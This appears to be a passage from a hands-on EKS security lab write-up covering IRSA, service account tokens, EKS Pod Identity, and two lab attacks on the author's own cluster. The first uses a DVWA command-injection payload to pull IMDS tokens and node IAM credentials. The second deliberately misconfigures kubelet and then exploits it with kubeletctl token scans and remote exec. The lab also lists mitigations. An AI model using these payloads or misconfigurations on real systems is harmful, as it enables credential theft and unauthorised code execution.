  5. Extract the Service Account token using SA_TOKEN=$(kubectl exec -it eks-iam-test2 -- cat /var/run/secrets/kubernetes.io/serviceaccount/token).
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: eks-iam-test2
spec:
  containers:
  - name: my-aws-cli
    image: amazon/aws-cli:latest
    command: ['sleep', '36000']
  restartPolicy: Never
  terminationGracePeriodSeconds: 0
EOF

kubectl get pod
kubectl describe pod
kubectl get pod eks-iam-test2 -o yaml | kubectl neat | yh
kubectl exec -it eks-iam-test2 -- ls /var/run/secrets/kubernetes.io/serviceaccount
kubectl exec -it eks-iam-test2 -- cat /var/run/secrets/kubernetes.io/serviceaccount/token ;echo

kubectl exec -it eks-iam-test2 -- aws s3 ls

SA_TOKEN=$(kubectl exec -it eks-iam-test2 -- cat /var/run/secrets/kubernetes.io/serviceaccount/token)
echo $SA_TOKEN

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod
NAME READY STATUS RESTARTS AGE
awscli-pod-5bdb44b5bd-9bh97 1/1 Running 0 104m
awscli-pod-5bdb44b5bd-cmddg 1/1 Running 0 104m
eks-iam-test1 0/1 Error 0 71s
eks-iam-test2 1/1 Running 0 28s
test-projected-volume 1/1 Running 0 7m42s

Analyzing the Service Account Token

  1. Decode the SA_TOKEN using a JWT decoding tool or the provided JWT website (https://jwt.io/).
  2. The decoded token consists of a header and a payload.
  • The header contains the algorithm (alg) and key ID (kid) used for token verification.
  • The payload includes OAuth2 properties such as aud (audience) and exp (expiration). These properties are added to the token using the projectedServiceAccountToken feature.
  • The iss (issuer) property represents the EKS OpenID Connect Provider (EKS IdP) address, which is used to verify the validity of the token issued by Kubernetes.

3. Delete the “eks-iam-test2” pod using kubectl delete pod eks-iam-test2.

Practice 3: Create it with OIDC

You need to create an IAM role that will be associated with the Kubernetes service account. The eksctl command below creates both in one step and attaches the desired policy: a service account named "my-sa" whose IAM role (the role name itself is generated by eksctl) has the "AmazonS3ReadOnlyAccess" policy attached.

eksctl create iamserviceaccount \
  --name my-sa \
  --namespace default \
  --cluster $CLUSTER_NAME \
  --approve \
  --attach-policy-arn $(aws iam list-policies --query 'Policies[?PolicyName==`AmazonS3ReadOnlyAccess`].Arn' --output text)

You can verify the creation of the IAM role by checking the AWS CloudFormation stack and the IAM console. Run the following command to list the IAM service accounts:

eksctl get iamserviceaccount --cluster $CLUSTER_NAME

Let’s inspect the newly created Kubernetes service account to see the associated IAM role.

kubectl get sa
kubectl describe sa my-sa

The output will show the annotations linking the service account to the IAM role.
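In particular, look for the eks.amazonaws.com/role-arn annotation; for the role created above it should resemble the following (the role name suffix is generated per cluster):

kubectl get sa my-sa -o yaml | grep role-arn
# eks.amazonaws.com/role-arn: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-3-addon-ia-Role1-B9vefeiqjTUD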

Let’s create a pod that uses the “my-sa” service account. Create a file named “pod.yaml” with the following content:

apiVersion: v1
kind: Pod
metadata:
  name: eks-iam-test
spec:
  serviceAccountName: my-sa
  containers:
  - name: aws-cli
    image: amazon/aws-cli:latest
    command: ['sleep', '36000']
  restartPolicy: Never
  terminationGracePeriodSeconds: 0

Let’s test if the pod can access AWS services using the assumed IAM role. Exec into the pod:

kubectl describe pod eks-iam-test
kubectl exec -it eks-iam-test -- /bin/bash

Inside the pod, run the following commands to verify the AWS identity and access:

aws sts get-caller-identity
aws s3 ls

We create a pod named “eks-iam-test3” that uses the “my-sa” service account.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# cat <<EOF | kubectl apply -f -
> apiVersion: v1
> kind: Pod
> metadata:
> name: eks-iam-test3
> spec:
> serviceAccountName: my-sa
> containers:
> - name: my-aws-cli
> image: amazon/aws-cli:latest
> command: ['sleep', '36000']
> restartPolicy: Never
> terminationGracePeriodSeconds: 0
> EOF
pod/eks-iam-test3 created

When a pod is created with a service account that is annotated with an IAM role, the pod-identity-webhook (a mutating admission webhook) injects AWS environment variables and a projected token volume into the pod.

kubectl get mutatingwebhookconfigurations pod-identity-webhook -o yaml | kubectl neat | yh

webhooks:
- admissionReviewVersions:
- v1beta1
clientConfig:
caBundle: "..."
url: https://127.0.0.1:23443/mutate
failurePolicy: Ignore
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod eks-iam-test3
NAME READY STATUS RESTARTS AGE
eks-iam-test3 1/1 Running 0 73s

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod eks-iam-test3 -o yaml | kubectl neat | yh
apiVersion: v1
kind: Pod
metadata:
name: eks-iam-test3
namespace: default
spec:
containers:
- command:
- sleep
- "36000"
env:
- name: AWS_STS_REGIONAL_ENDPOINTS
value: regional
- name: AWS_DEFAULT_REGION
value: ap-northeast-2
- name: AWS_REGION
value: ap-northeast-2
- name: AWS_ROLE_ARN
value: arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-3-addon-ia-Role1-B9vefeiqjTUD
- name: AWS_WEB_IDENTITY_TOKEN_FILE
value: /var/run/secrets/eks.amazonaws.com/serviceaccount/token
image: amazon/aws-cli:latest
name: my-aws-cli
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-2c4jv
readOnly: true
- mountPath: /var/run/secrets/eks.amazonaws.com/serviceaccount
name: aws-iam-token
readOnly: true
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Never
serviceAccountName: my-sa
terminationGracePeriodSeconds: 0
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: aws-iam-token
projected:
sources:
- serviceAccountToken:
audience: sts.amazonaws.com
expirationSeconds: 86400
path: token
- name: kube-api-access-2c4jv
projected:
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
fieldPath: metadata.namespace
path: namespace
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it eks-iam-test3 -- ls /var/run/secrets/eks.amazonaws.com/serviceaccount
token
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it eks-iam-test3 -- cat /var/run/secrets/eks.amazonaws.com/serviceaccount/token ; echo
eyJhbGciOiJSUzI1NiIsImtpZCI6IjhlY2Y3Y2FkNzhhN...
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# eksctl get iamserviceaccount --cluster $CLUSTER_NAME

NAMESPACE NAME ROLE ARN
default my-sa arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-3-addon-ia-Role1-B9vefeiqjTUD
kube-system aws-lb-controller arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-3-addon-ia-Role1-y3cTEuBKUvir
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]#
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it eks-iam-test3 -- aws sts get-caller-identity --query Arn


"arn:aws:sts::712218945685:assumed-role/eksctl-sigridjin-ekscluster-240413-3-addon-ia-Role1-B9vefeiqjTUD/botocore-session-1713006774"

kubectl exec -it eks-iam-test3 -- aws s3 ls
kubectl exec -it eks-iam-test3 -- aws ec2 describe-instances --region ap-northeast-2
kubectl exec -it eks-iam-test3 -- aws ec2 describe-vpcs --region ap-northeast-2

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod eks-iam-test3 -o json | jq -r '.spec.containers | .[].volumeMounts'

[
{
"mountPath": "/var/run/secrets/kubernetes.io/serviceaccount",
"name": "kube-api-access-2c4jv",
"readOnly": true
},
{
"mountPath": "/var/run/secrets/eks.amazonaws.com/serviceaccount",
"name": "aws-iam-token",
"readOnly": true
}
]
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl api-resources |grep hook

mutatingwebhookconfigurations admissionregistration.k8s.io/v1 false MutatingWebhookConfiguration
validatingwebhookconfigurations admissionregistration.k8s.io/v1 false ValidatingWebhookConfiguration

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl api-resources |grep hook

mutatingwebhookconfigurations admissionregistration.k8s.io/v1 false MutatingWebhookConfiguration
validatingwebhookconfigurations admissionregistration.k8s.io/v1 false ValidatingWebhookConfiguration

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get MutatingWebhookConfiguration

NAME WEBHOOKS AGE
aws-load-balancer-webhook 3 7h59m
kube-prometheus-stack-admission 1 8h
pod-identity-webhook 1 8h
vpc-resource-mutating-webhook 1 8h

# Check the AWS_WEB_IDENTITY_TOKEN_FILE token
IAM_TOKEN=$(kubectl exec -it eks-iam-test3 -- cat /var/run/secrets/eks.amazonaws.com/serviceaccount/token)
echo $IAM_TOKEN
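To inspect the token's claims locally instead of pasting it into jwt.io, you can decode the payload segment by hand. A rough sketch (the final comment describes the claims to expect, not literal output):

# The JWT payload is the second dot-separated, base64url-encoded field.
PAYLOAD=$(echo "$IAM_TOKEN" | cut -d. -f2 | tr '_-' '/+')
# Restore the padding that JWTs strip off, then decode and pick the interesting claims.
while [ $(( ${#PAYLOAD} % 4 )) -ne 0 ]; do PAYLOAD="${PAYLOAD}="; done
echo "$PAYLOAD" | base64 -d | jq '{iss, sub, aud, exp}'
# Expect iss to be the cluster's OIDC issuer URL, sub to be system:serviceaccount:default:my-sa,
# and aud to be sts.amazonaws.com.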

It’s important to note that AWS only validates the JWT token and does not ensure consistency between the token file and the actual role specified in the service account. If the IAM role trust policy is not properly configured, it could allow assuming unintended roles using the same token.

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get pod eks-iam-test3 -o json | jq -r '.spec.containers | .[].env'

[
{
"name": "AWS_STS_REGIONAL_ENDPOINTS",
"value": "regional"
},
{
"name": "AWS_DEFAULT_REGION",
"value": "ap-northeast-2"
},
{
"name": "AWS_REGION",
"value": "ap-northeast-2"
},
{
"name": "AWS_ROLE_ARN",
"value": "arn:aws:iam::712218945685:role/eksctl-sigridjin-ekscluster-240413-3-addon-ia-Role1-B9vefeiqjTUD"
},
{
"name": "AWS_WEB_IDENTITY_TOKEN_FILE",
"value": "/var/run/secrets/eks.amazonaws.com/serviceaccount/token"
}
]

Current Limitations of IRSA

  1. The OIDC endpoint is publicly accessible, which can be a security concern.
  2. AWS only verifies the validity of the JWT token but does not ensure consistency between the token file and the actual role specified in the Service Account.
  • If the Condition is not properly set, the same token can be used to assume different roles, as long as the token and role ARN are available.

Introduction of EKS Pod Identity

AWS has simplified the process of granting IAM permissions to individual pods. EKS Pod Identity is implemented as an add-on that deploys a DaemonSet named eks-pod-identity-agent in the kube-system namespace.

This DaemonSet runs on every node in the cluster and is responsible for serving temporary credentials to the pods on that node. With hostNetwork: true, the agent pods use the host network instead of the pod network and listen on a link-local address on the node (169.254.170.23 for IPv4), which is where the AWS SDKs running inside pods fetch their credentials.

  1. Check the available versions of the eks-pod-identity-agent add-on using the aws eks describe-addon-versions command.
  2. Install the eks-pod-identity-agent add-on using either aws eks create-addon or eksctl create addon command.
  3. Verify the installation by checking the add-on status with eksctl get addon and the related DaemonSet and pods in the kube-system namespace.
$ ADDON=eks-pod-identity-agent
aws eks describe-addon-versions \
--addon-name $ADDON \
--kubernetes-version 1.28 \
--query "addons[].addonVersions[].[addonVersion, compatibilities[].defaultVersion]" \
--output text
v1.2.0-eksbuild.1
True
v1.1.0-eksbuild.1
False
v1.0.0-eksbuild.1
False

$ aws eks create-addon --cluster-name $CLUSTER_NAME --addon-name eks-pod-identity-agent

eksctl get addon --cluster $CLUSTER_NAME
kubectl -n kube-system get daemonset eks-pod-identity-agent
kubectl -n kube-system get pods -l app.kubernetes.io/name=eks-pod-identity-agent
kubectl get ds -n kube-system eks-pod-identity-agent -o yaml | kubectl neat | yh

containers:
- args:
- --port
- "80"
- --cluster-name
- sigridjin-ekscluster-240413-3
- --probe-port
- "2703"
command:
- /go-runner
- /eks-pod-identity-agent
- server
env:
- name: AWS_REGION
value: ap-northeast-2
image: 602401143452.dkr.ecr.ap-northeast-2.amazonaws.com/eks/eks-pod-identity-agent:0.1.6
imagePullPolicy: Always
livenessProbe:
failureThreshold: 3
httpGet:
host: localhost
path: /healthz
port: probes-port
scheme: HTTP
initialDelaySeconds: 30
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 10
name: eks-pod-identity-agent
ports:
- containerPort: 80
name: proxy
protocol: TCP
- containerPort: 2703
name: probes-port
protocol: TCP
readinessProbe:
failureThreshold: 30
httpGet:
host: localhost
path: /readyz
port: probes-port
scheme: HTTP
initialDelaySeconds: 1
periodSeconds: 10
successThreshold: 1
timeoutSeconds: 10
securityContext:
capabilities:
add:
- CAP_NET_BIND_SERVICE
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
dnsPolicy: ClusterFirst
hostNetwork: true
# Check the network configuration
## EKS Pod Identity Agent uses the hostNetwork of the node and it uses port 80 and port 2703 on a link-local address on the node.
## This address is 169.254.170.23 for IPv4 and [fd00:ec2::23] for IPv6 clusters.
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ss -tnlp | grep eks-pod-identit; echo "-----";done
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ip -c route; done
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ip -c -br -4 addr; done
for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ip -c addr; done

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# for node in $N1 $N2 $N3; do ssh ec2-user@$node sudo ss -tnlp | grep eks-pod-identit; echo "-----";done
LISTEN 0 4096 127.0.0.1:2703 0.0.0.0:* users:(("eks-pod-identit",pid=166686,fd=4))
LISTEN 0 4096 169.254.170.23:80 0.0.0.0:* users:(("eks-pod-identit",pid=166686,fd=3))
LISTEN 0 4096 [fd00:ec2::23]:80 [::]:* users:(("eks-pod-identit",pid=166686,fd=8))
-----
LISTEN 0 4096 127.0.0.1:2703 0.0.0.0:* users:(("eks-pod-identit",pid=165854,fd=8))
LISTEN 0 4096 169.254.170.23:80 0.0.0.0:* users:(("eks-pod-identit",pid=165854,fd=7))
LISTEN 0 4096 [fd00:ec2::23]:80 [::]:* users:(("eks-pod-identit",pid=165854,fd=6))
-----
LISTEN 0 4096 127.0.0.1:2703 0.0.0.0:* users:(("eks-pod-identit",pid=167313,fd=8))
LISTEN 0 4096 169.254.170.23:80 0.0.0.0:* users:(("eks-pod-identit",pid=167313,fd=3))
LISTEN 0 4096 [fd00:ec2::23]:80 [::]:* users:(("eks-pod-identit",pid=167313,fd=4))
-----

A pod identity association maps a Kubernetes service account to an IAM role. It allows pods using the specified service account to assume the associated IAM role and gain the permissions defined in the attached policy. In this practice, we create an association between the s3-sa service account and the s3-eks-pod-identity-role IAM role, granting read-only access to Amazon S3.

Create a pod identity association using the eksctl create podidentityassociation command, specifying the cluster name, namespace, service account name, role name, and permission policy ARNs.

Verify the created association using eksctl get podidentityassociation and aws eks list-pod-identity-associations.

eksctl create podidentityassociation \
--cluster $CLUSTER_NAME \
--namespace default \
--service-account-name s3-sa \
--role-name s3-eks-pod-identity-role \
--permission-policy-arns arn:aws:iam::aws:policy/AmazonS3ReadOnlyAccess \
--region $AWS_REGION

# Verify

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl get sa
NAME SECRETS AGE
default 0 8h
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# eksctl get podidentityassociation --cluster $CLUSTER_NAME

ASSOCIATION ARN NAMESPACE SERVICE ACCOUNT NAME IAM ROLE ARN
arn:aws:eks:ap-northeast-2:712218945685:podidentityassociation/sigridjin-ekscluster-240413-3/a-mibij9hipipbfdig4 default s3-sa arn:aws:iam::712218945685:role/s3-eks-pod-identity-role


(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws eks list-pod-identity-associations --cluster-name $CLUSTER_NAME | jq

{
"associations": [
{
"clusterName": "sigridjin-ekscluster-240413-3",
"namespace": "default",
"serviceAccount": "s3-sa",
"associationArn": "arn:aws:eks:ap-northeast-2:712218945685:podidentityassociation/sigridjin-ekscluster-240413-3/a-mibij9hipipbfdig4",
"associationId": "a-mibij9hipipbfdig4"
}
]
}

# sts:TagSession is included in the trust policy to support ABAC (session tags)
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# aws iam get-role --query 'Role.AssumeRolePolicyDocument' --role-name s3-eks-pod-identity-role | jq .

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"Service": "pods.eks.amazonaws.com"
},
"Action": [
"sts:AssumeRole",
"sts:TagSession"
]
}
]
}

When a pod is created with a service account that has a pod identity association, EKS Pod Identity automatically injects the necessary environment variables and token files into the pod. These include AWS_CONTAINER_CREDENTIALS_FULL_URI, AWS_CONTAINER_AUTHORIZATION_TOKEN_FILE, and region-related variables. The pod can then use these credentials to assume the associated IAM role and access AWS resources accordingly.
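Concretely, the injected environment looks roughly like this (values as documented for EKS Pod Identity; the URI points at the agent's link-local address shown earlier):

AWS_CONTAINER_CREDENTIALS_FULL_URI=http://169.254.170.23/v1/credentials
AWS_CONTAINER_AUTHORIZATION_TOKEN_FILE=/var/run/secrets/pods.eks.amazonaws.com/serviceaccount/eks-pod-identity-token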

  1. Create a service account named s3-sa using kubectl create sa.
  2. Create a pod named eks-pod-identity with the s3-sa service account using the provided YAML configuration.
  3. Verify the pod’s configuration and check the assumed IAM role using kubectl exec.
  4. Test the pod’s access to AWS resources by running AWS CLI commands inside the pod.
kubectl create sa s3-sa

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: eks-pod-identity
spec:
  serviceAccountName: s3-sa
  containers:
  - name: my-aws-cli
    image: amazon/aws-cli:latest
    command: ['sleep', '36000']
  restartPolicy: Never
  terminationGracePeriodSeconds: 0
EOF

kubectl get pod eks-pod-identity -o yaml | kubectl neat| yh
kubectl exec -it eks-pod-identity -- aws sts get-caller-identity --query Arn
kubectl exec -it eks-pod-identity -- aws s3 ls
kubectl exec -it eks-pod-identity -- env | grep AWS

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it eks-pod-identity -- aws sts get-caller-identity --query Arn
kubectl exec -it eks-pod-identity -- aws s3 ls
kubectl exec -it eks-pod-identity -- env | grep AWS
"arn:aws:sts::712218945685:assumed-role/s3-eks-pod-identity-role/eks-sigridjin--eks-pod-id-c36404b4-b9dc-47b0-a7ea-f2cd5a635462"
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# # Check the token file
(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# kubectl exec -it eks-pod-identity -- ls /var/run/secrets/pods.eks.amazonaws.com/serviceaccount/
eks-pod-identity-token

OWASP Kubernetes Top Ten

Let’s go through the practice step by step to understand how a vulnerable Kubernetes pod can be exploited to access the AWS Instance Metadata Service (IMDS) and retrieve sensitive information.

We deploy a vulnerable web application called Damn Vulnerable Web Application (DVWA) using Kubernetes manifests. The manifests include a Secret, ConfigMap, Deployment, and Service for both the DVWA application and a MySQL database.

# Look up CERT_ARN
CERT_ARN=$(aws acm list-certificates --query 'CertificateSummaryList[].CertificateArn[]' --output text)
echo $CERT_ARN

cat <<EOT > mysql.yaml
apiVersion: v1
kind: Secret
metadata:
name: dvwa-secrets
type: Opaque
data:
# s3r00tpa55
ROOT_PASSWORD: czNyMDB0cGE1NQ==
# dvwa
DVWA_USERNAME: ZHZ3YQ==
# p@ssword
DVWA_PASSWORD: cEBzc3dvcmQ=
# dvwa
DVWA_DATABASE: ZHZ3YQ==
---
apiVersion: v1
kind: Service
metadata:
name: dvwa-mysql-service
spec:
selector:
app: dvwa-mysql
tier: backend
ports:
- protocol: TCP
port: 3306
targetPort: 3306
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: dvwa-mysql
spec:
replicas: 1
selector:
matchLabels:
app: dvwa-mysql
tier: backend
template:
metadata:
labels:
app: dvwa-mysql
tier: backend
spec:
containers:
- name: mysql
image: mariadb:10.1
resources:
requests:
cpu: "0.3"
memory: 256Mi
limits:
cpu: "0.3"
memory: 256Mi
ports:
- containerPort: 3306
env:
- name: MYSQL_ROOT_PASSWORD
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: ROOT_PASSWORD
- name: MYSQL_USER
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_USERNAME
- name: MYSQL_PASSWORD
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_PASSWORD
- name: MYSQL_DATABASE
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_DATABASE
EOT
kubectl apply -f mysql.yaml

cat <<EOT > dvwa.yaml
apiVersion: v1
kind: ConfigMap
metadata:
name: dvwa-config
data:
RECAPTCHA_PRIV_KEY: ""
RECAPTCHA_PUB_KEY: ""
SECURITY_LEVEL: "low"
PHPIDS_ENABLED: "0"
PHPIDS_VERBOSE: "1"
PHP_DISPLAY_ERRORS: "1"
---
apiVersion: v1
kind: Service
metadata:
name: dvwa-web-service
spec:
selector:
app: dvwa-web
type: ClusterIP
ports:
- protocol: TCP
port: 80
targetPort: 80
---
apiVersion: apps/v1
kind: Deployment
metadata:
name: dvwa-web
spec:
replicas: 1
selector:
matchLabels:
app: dvwa-web
template:
metadata:
labels:
app: dvwa-web
spec:
containers:
- name: dvwa
image: cytopia/dvwa:php-8.1
ports:
- containerPort: 80
resources:
requests:
cpu: "0.3"
memory: 256Mi
limits:
cpu: "0.3"
memory: 256Mi
env:
- name: RECAPTCHA_PRIV_KEY
valueFrom:
configMapKeyRef:
name: dvwa-config
key: RECAPTCHA_PRIV_KEY
- name: RECAPTCHA_PUB_KEY
valueFrom:
configMapKeyRef:
name: dvwa-config
key: RECAPTCHA_PUB_KEY
- name: SECURITY_LEVEL
valueFrom:
configMapKeyRef:
name: dvwa-config
key: SECURITY_LEVEL
- name: PHPIDS_ENABLED
valueFrom:
configMapKeyRef:
name: dvwa-config
key: PHPIDS_ENABLED
- name: PHPIDS_VERBOSE
valueFrom:
configMapKeyRef:
name: dvwa-config
key: PHPIDS_VERBOSE
- name: PHP_DISPLAY_ERRORS
valueFrom:
configMapKeyRef:
name: dvwa-config
key: PHP_DISPLAY_ERRORS
- name: MYSQL_HOSTNAME
value: dvwa-mysql-service
- name: MYSQL_DATABASE
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_DATABASE
- name: MYSQL_USERNAME
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_USERNAME
- name: MYSQL_PASSWORD
valueFrom:
secretKeyRef:
name: dvwa-secrets
key: DVWA_PASSWORD
EOT
kubectl apply -f dvwa.yaml

cat <<EOT > dvwa-ingress.yaml
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
annotations:
alb.ingress.kubernetes.io/certificate-arn: $CERT_ARN
alb.ingress.kubernetes.io/group.name: study
alb.ingress.kubernetes.io/listen-ports: '[{"HTTPS":443}, {"HTTP":80}]'
alb.ingress.kubernetes.io/load-balancer-name: myeks-ingress-alb
alb.ingress.kubernetes.io/scheme: internet-facing
alb.ingress.kubernetes.io/ssl-redirect: "443"
alb.ingress.kubernetes.io/success-codes: 200-399
alb.ingress.kubernetes.io/target-type: ip
name: ingress-dvwa
spec:
ingressClassName: alb
rules:
- host: dvwa.$MyDomain
http:
paths:
- backend:
service:
name: dvwa-web-service
port:
number: 80
path: /
pathType: Prefix
EOT
kubectl apply -f dvwa-ingress.yaml
echo -e "DVWA Web https://dvwa.$MyDomain"
In DVWA's Command Injection page (the SECURITY_LEVEL is set to "low" above), anything appended after the ping target is executed inside the DVWA pod. Submitting the payload below returns an IMDSv2 token from the node's metadata service:

8.8.8.8 ; curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600"
AQAEAH1_MpNsEHXzA1f8b05FN_Wb9jsJq1T-cG5fmKTFXk8_Khslvw==

curl -s -H "X-aws-ec2-metadata-token: AQAEAH1_MpN3DJTXfj6XAujLH2gFWDlekt8Cji-kWV3VU2Iyfw4gEA==" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/

eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR

curl -s -H "X-aws-ec2-metadata-token: AQAEAH1_MpN3DJTXfj6XAujLH2gFWDlekt8Cji-kWV3VU2Iyfw4gEA==" -v http://169.254.169.254/latest/meta-data/iam/security-credentials/eksctl-sigridjin-ekscluster-240413-NodeInstanceRole-8sKVcxuACRiR
ssh ec2-user@$N1 cat /etc/kubernetes/kubelet/kubelet-config.json | jq
ssh ec2-user@$N1 cat /var/lib/kubelet/kubeconfig | yh

(iam-root-account@sigridjin-ekscluster-240413-3:default) [root@sigridjin-ekscluster-240413-3-bastion ~]# ssh ec2-user@$N1 sudo ss -tnlp | grep kubelet
LISTEN 0 4096 127.0.0.1:10248 0.0.0.0:* users:(("kubelet",pid=3028,fd=16))
LISTEN 0 4096 *:10250 *:* users:(("kubelet",pid=3028,fd=12)) *:* users:(("kubelet",pid=2940,fd=21))

cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
  name: myawscli
spec:
  #serviceAccountName: my-sa
  containers:
  - name: my-aws-cli
    image: amazon/aws-cli:latest
    command: ['sleep', '36000']
  restartPolicy: Never
  terminationGracePeriodSeconds: 0
EOF

# Use the pod
kubectl exec -it myawscli -- aws sts get-caller-identity --query Arn
kubectl exec -it myawscli -- aws s3 ls
kubectl exec -it myawscli -- aws ec2 describe-instances --region ap-northeast-2 --output table --no-cli-pager
kubectl exec -it myawscli -- aws ec2 describe-vpcs --region ap-northeast-2 --output table --no-cli-pager

To mitigate this vulnerability, ensure that your Kubernetes pods are properly secured and do not allow arbitrary command execution. Implement strict pod security policies, limit network access to the IMDS, and use IAM roles with least privilege permissions.

Additionally, consider enabling IMDSv2 and disabling IMDSv1 on your EC2 instances to further enhance security.
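For example, IMDSv2 can be enforced on a node and the PUT response hop limit lowered to 1, so that pods which do not use host networking cannot obtain a metadata token at all (the instance ID below is a placeholder):

aws ec2 modify-instance-metadata-options \
  --instance-id i-0123456789abcdef0 \
  --http-tokens required \
  --http-put-response-hop-limit 1 \
  --region ap-northeast-2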

Let’s go through the practice of exploiting a misconfigured kubelet step by step using kubeletctl.

We need to install kubeletctl, a tool that allows us to interact with the kubelet API. Run the following commands on your second bastion host (myeks-bastion-2):

# Remove existing kubeconfig (if any)
rm -rf ~/.kube
# Download and install kubeletctl
curl -LO https://github.com/cyberark/kubeletctl/releases/download/v1.11/kubeletctl_linux_amd64 && \
chmod a+x ./kubeletctl_linux_amd64 && \
mv ./kubeletctl_linux_amd64 /usr/local/bin/kubeletctl
# Verify the installation
kubeletctl version
kubeletctl help

Set the IP address of your worker node (e.g., Node 1) as an environment variable. Replace `<NODE_IP>` with the internal IP address of your worker node. Use kubeletctl to scan the specified node IP address for the kubelet API.

N1=<NODE_IP>
kubeletctl scan --cidr $N1/32
curl -k https://$N1:10250/pods; echo # kubelet API

If the kubelet API is properly secured, you should receive an “Unauthorized” error. To simulate a misconfiguration, SSH into the worker node (e.g., Node 1) from your bastion host and edit the kubelet configuration file (/etc/kubernetes/kubelet/kubelet-config.json) so that anonymous authentication is enabled and the authorization mode is set to AlwaysAllow.

ssh ec2-user@$N1
sudo vi /etc/kubernetes/kubelet/kubelet-config.json
"authentication": {
"anonymous": {
"enabled": true
}
},
"authorization": {
"mode": "AlwaysAllow"
}

Step 7: Exploit the misconfigured kubelet (from the bastion host)

# List the pods on the node
curl -s -k https://$N1:10250/pods | jq

# Check the kubelet-config.json contents
curl -k https://$N1:10250/configz | jq

# Using kubeletctl
# Return kubelet's configuration
kubeletctl -s $N1 configz | jq

# Get list of pods on the node
kubeletctl -s $N1 pods

# Scan the node's open kubelet API for all service account tokens
kubeletctl -s $N1 scan token
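
# If the scan surfaces a service account token, it can be replayed directly against the API server
# (sketch only; APISERVER and TOKEN below are placeholders for the cluster endpoint and a captured token)
APISERVER=https://<cluster-endpoint>
TOKEN='<token captured by the scan>'
kubectl --server=$APISERVER --token=$TOKEN --insecure-skip-tls-verify=true auth can-i --list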

# Note: the exercise below requires the myawscli pod to be running on worker node 1; it also works on nodes 2-3 if their kubelet is modified the same way.
# Execute a command via the kubelet API: <namespace> / <pod name> / <container name>
curl -k https://$N1:10250/run/default/myawscli/my-aws-cli -d "cmd=aws --version"

# Scan the node's open kubelet API for containers vulnerable to remote code execution
kubeletctl -s $N1 scan rce

# Run commands inside a container
kubeletctl -s $N1 exec "/bin/bash" -n default -p myawscli -c my-aws-cli
--------------------------------
export
aws --version
